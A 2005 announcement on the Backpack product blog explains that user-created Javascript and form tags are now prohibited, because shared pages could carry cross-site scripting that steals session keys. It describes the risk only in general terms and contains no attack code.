Custom Javascript and form tags prohibited for security reasons

Despite the great uses we’ve already seen of integration with Flickr and other services, we’ve unfortunately been forced to prohibit user-created Javascript and form tags from all pages due to security reasons. This means you can’t add your own Javascript code or forms to your pages.

The problem is that prior to this update, a malicious user could trick an unsuspecting Backpack owner into accepting a shared page that contained Javascript for stealing the session key. Once stolen, this could be used to gain access to the account.

The technique is known as cross-site scripting or XSS. And although it only affected privately shared pages (which 99% of the time are only shared with people you know and trust), it was still too much of a risk to permit. It would basically set Backpack back to the days of where just opening an email in Outlook could give you a virus. We don’t want that and you don’t want that.

We are, however, dedicated to allowing integration with third party services such as Flickr through other means. We’re working on ideas for that. Thank you for your understanding. This is one of those fixes that really is for your benefit. If only the world was free of malicious users.

May 6, 2005 in Announcements

This is the Backpack Weblog, a place for the latest news, tips, tricks.

Sections

XML - Full Posts

The names and logos for Basecamp, Highrise, Backpack, and 37signals are registered trademarks of 37signals, LLC.
The names and logos for Campfire, Ta-da List, and Writeboard are trademarks of 37signals, LLC.
All text and design is copyright ©1999-2008 37signals, LLC. All rights reserved.